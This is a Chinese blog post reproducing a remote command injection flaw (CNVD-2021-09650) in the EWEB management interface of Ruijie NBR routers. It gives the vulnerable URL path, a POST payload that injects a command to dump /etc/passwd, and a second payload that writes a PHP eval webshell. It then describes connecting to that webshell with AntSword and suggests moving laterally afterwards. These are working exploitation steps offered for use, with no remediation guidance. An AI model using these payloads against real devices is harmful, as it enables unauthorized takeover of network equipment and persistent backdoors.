网管系统锐捷:锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell

锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
漏洞编号:
CNVD-2021-09650

漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

漏洞影响:
锐捷NBR路由器 EWEB网关系统

漏洞复现:


首先打开网关系统

然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。
我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
这句代码的意思是使用cat 查看/etc/passwd路径下的passwd 文件,并将内容保存到test.txt

接着我们访问url/test.txt 路径,查看文件。

回显了/etc/passwd路径下passwd文件的内容

利用漏洞文件文件上传。
利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

漏洞复现:

Payload :
mac=1&ip=127.0.0.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > sorry.php

将这句话execute一下。

然后我们直接上蚁剑连接就ok了

这边直接能看到我们上传的webshell

右击终端


然后就可以进一步的横向或者纵向,也可以进一步信息收集。

博客来之不易,还望各位大佬点赞关注,谢谢!
想找安全岗位私信内推哦!

相关推荐

相关文章